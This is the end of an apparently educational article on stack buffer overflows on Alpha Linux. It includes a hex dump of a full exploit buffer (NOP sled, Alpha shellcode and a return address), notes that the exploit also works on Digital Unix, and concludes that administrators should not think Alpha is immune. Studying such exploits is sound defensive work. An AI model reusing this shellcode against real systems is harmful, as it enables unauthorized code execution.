  176  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  192  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  208  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  224  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  240  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  256  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  272  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  288  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  304  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  320  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  336  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  352  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  368  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  384  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  400  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  416  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  432  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  448  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  464  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  480  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  496  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  512  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  528  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  544  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  560  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  576  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  592  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  608  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  624  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  640  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  656  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  672  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  688  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  704  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  720  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  736  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  752  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  768  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  784  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  800  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  816  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  832  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  848  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  864  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  880  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  896  04 ff 47 1f 04 ff 47 1f 04 ff 47 1f 04 ff 47 1f      ..G...G...G...G.
  912  04 ff 47 30 15 d9 43 11 74 f0 47 12 14 02 42 fc      ..G0..C.t.G...B.
  928  ff 32 b2 12 94 09 42 fc ff 32 b2 ff 47 3f 26 1f      .2....B..2..G?&.
  944  04 31 22 fc ff 30 b2 f7 ff 1f d2 10 04 ff 47 11      .1"..0........G.
  960  14 e3 43 20 35 20 42 ff ff ff ff 30 15 d9 43 31      ..C 5 B....0..C1
  976  15 d8 43 12 04 ff 47 40 ff 1e b6 48 ff fe b7 98      [email protected]....
  992  ff 7f 26 d0 8c 73 22 13 05 f3 47 3c ff 7e b2 69      ..&..s"...G<.~.i
 1008  6e 7f 26 2f 62 73 22 38 ff 7e b2 13 94 e7 43 20      n.&/bs"8.~....C 
 1024  35 60 42 ff ff ff ff 30 f5 ff 1f 01                  5`B....0....    

3 ~ 914
 nop instructions.
915 ~ 1030
 shellcode.
1031 ~ 1038
 return address. 0x000000001ffff530 ( "\x30\xf5\xff\x1f\x01\x00\x00\x00" )
Don't worry about the trailing '\0' bytes.
----------------------------------------------------------------------------



9. Buffer overflow in digital unix
The exploit code from this article also works on digital unix.



10. Conclusion
This article shows a buffer overflow technique for alpha linux. Many administrators do not worry about buffer overflows because they administer alpha linux rather than intel x86. Some people think that a buffer overflow is impossible on alpha linux. As you can see, it is possible.
DON'T BELIEVE THAT A BUFFER OVERFLOW IS IMPOSSIBLE ON ALPHA.



11. References
Alpha Architecture Handbook
http://ftp.digital.com/pub/Digital/info/semiconductor/literature/alphaahb.pdf